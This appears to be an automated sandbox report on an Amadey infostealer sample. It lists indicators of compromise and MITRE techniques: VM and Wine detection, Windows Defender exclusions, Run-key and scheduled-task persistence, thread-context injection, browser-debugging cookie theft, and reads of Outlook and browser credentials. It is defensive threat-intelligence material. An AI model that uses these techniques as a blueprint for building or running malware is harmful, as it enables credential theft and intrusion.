amadey | 7c91a1dcb3bdc0ff94a9f4dce61cf5db01eed3b6c7971dfa0f9ad0fc668efbdd

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5c814807ae.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
14	2904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6868	powershell.exe
2904	powershell.exe

Downloads MZ/PE file 13 IoCs

flow	pid	Process
281	4472	MSBuild.exe
179	5392	rapes.exe
14	2904	powershell.exe
247	4472	MSBuild.exe
32	5392	rapes.exe
32	5392	rapes.exe
32	5392	rapes.exe
32	5392	rapes.exe
32	5392	rapes.exe
32	5392	rapes.exe
32	5392	rapes.exe
32	5392	rapes.exe
236	4472	MSBuild.exe

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
6760	chrome.exe
6752	chrome.exe
6824	chrome.exe
7120	chrome.exe
4036	msedge.exe
1940	msedge.exe
4452	msedge.exe
1468	msedge.exe
4568	msedge.exe
6440	chrome.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5c814807ae.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5c814807ae.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	352038b977.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	352038b977.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rapes.exe

Executes dropped EXE 21 IoCs

pid	Process
5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
5392	rapes.exe
3916	v1BRaoR.exe
3860	Nehh6wZ.exe
3004	31W3sid.exe
816	NlmvJyQ.exe
4460	efd0386a9c.exe
2704	5c814807ae.exe
5656	352038b977.exe
5528	efe6bfcae2.exe
736	rapes.exe
5776	367de4acd7.exe
632	f078cfe6f7.exe
396	31W3sid.exe
5776	DgQBvwg.exe
2168	exp.exe
4784	larBxd7.exe
4452	9sWdA2p.exe
3596	rapes.exe
5704	Rm3cVPI.exe
4004	v1BRaoR.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	5c814807ae.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	MSBuild.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\efe6bfcae2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494500101\\efe6bfcae2.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5c814807ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494480101\\5c814807ae.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\352038b977.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494490101\\352038b977.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00060000000227c8-167.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
5392	rapes.exe
2704	5c814807ae.exe
736	rapes.exe
3596	rapes.exe

Suspicious use of SetThreadContext 14 IoCs

description	pid	Process	procid_target
PID 3916 set thread context of 4536	3916	v1BRaoR.exe	105
PID 3860 set thread context of 860	3860	Nehh6wZ.exe	110
PID 3004 set thread context of 1248	3004	31W3sid.exe	112
PID 816 set thread context of 1564	816	NlmvJyQ.exe	114
PID 4460 set thread context of 5500	4460	efd0386a9c.exe	117
PID 396 set thread context of 2096	396	31W3sid.exe	159
PID 5776 set thread context of 4472	5776	DgQBvwg.exe	165
PID 2168 set thread context of 3860	2168	exp.exe	176
PID 4472 set thread context of 3756	4472	MSBuild.exe	178
PID 4472 set thread context of 3860	4472	MSBuild.exe	181
PID 4004 set thread context of 5352	4004	v1BRaoR.exe	184
PID 4472 set thread context of 2804	4472	MSBuild.exe	185
PID 4472 set thread context of 6980	4472	MSBuild.exe	209
PID 4472 set thread context of 2168	4472	MSBuild.exe	211

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	MSBuild.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI217D.tmp	msiexec.exe
File created	C:\Windows\Installer\e581fcc.msi	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
File opened for modification	C:\Windows\Installer\e581fc8.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{90C11C8A-AD21-4E7E-BDFA-BD9C724A6087}	msiexec.exe
File created	C:\Windows\Installer\e581fc8.msi	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1984	4536	WerFault.exe	105
1748	5500	WerFault.exe	117
6292	5352	WerFault.exe	184

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5c814807ae.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	efe6bfcae2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	efe6bfcae2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	367de4acd7.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	efe6bfcae2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	MSBuild.exe

Checks processor information in registry 2 TTPs 38 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	MSBuild.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3964	taskkill.exe
3916	taskkill.exe
5964	taskkill.exe
3368	taskkill.exe
1496	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe

Modifies registry class 28 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\PackageCode = "CEFEBEF251D3D34458A6CE4F5E1D0E42"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10494510271\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06B55B94726C2574FA40E2F795DBA41E\A8C11C0912DAE7E4DBAFDBC927A40678	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\PackageName = "33e3372c0a.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rundll32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678\DefaultFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\ProductName = "BatchInstallerFinal"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\Media	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A8C11C0912DAE7E4DBAFDBC927A40678	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\AuthorizedLUAApp = "0"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A8C11C0912DAE7E4DBAFDBC927A40678\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\10494510271\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4928	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4472	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2904	powershell.exe
2904	powershell.exe
5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
5392	rapes.exe
5392	rapes.exe
860	MSBuild.exe
860	MSBuild.exe
860	MSBuild.exe
860	MSBuild.exe
1564	MSBuild.exe
1564	MSBuild.exe
1564	MSBuild.exe
1564	MSBuild.exe
5500	MSBuild.exe
5500	MSBuild.exe
5500	MSBuild.exe
5500	MSBuild.exe
2704	5c814807ae.exe
2704	5c814807ae.exe
2704	5c814807ae.exe
2704	5c814807ae.exe
2704	5c814807ae.exe
2704	5c814807ae.exe
736	rapes.exe
736	rapes.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
1372	msiexec.exe
1372	msiexec.exe
1372	msiexec.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
2168	exp.exe
2168	exp.exe
2168	exp.exe
2168	exp.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4784	larBxd7.exe
4784	larBxd7.exe
4784	larBxd7.exe
4784	larBxd7.exe
4784	larBxd7.exe
4784	larBxd7.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe
4472	MSBuild.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4036	msedge.exe
4036	msedge.exe
4036	msedge.exe
4036	msedge.exe
6440	chrome.exe
6440	chrome.exe
6440	chrome.exe
6440	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	4536	MSBuild.exe
Token: SeIncreaseQuotaPrivilege	4536	MSBuild.exe
Token: SeSecurityPrivilege	4536	MSBuild.exe
Token: SeTakeOwnershipPrivilege	4536	MSBuild.exe
Token: SeLoadDriverPrivilege	4536	MSBuild.exe
Token: SeSystemProfilePrivilege	4536	MSBuild.exe
Token: SeSystemtimePrivilege	4536	MSBuild.exe
Token: SeProfSingleProcessPrivilege	4536	MSBuild.exe
Token: SeIncBasePriorityPrivilege	4536	MSBuild.exe
Token: SeCreatePagefilePrivilege	4536	MSBuild.exe
Token: SeBackupPrivilege	4536	MSBuild.exe
Token: SeRestorePrivilege	4536	MSBuild.exe
Token: SeShutdownPrivilege	4536	MSBuild.exe
Token: SeDebugPrivilege	4536	MSBuild.exe
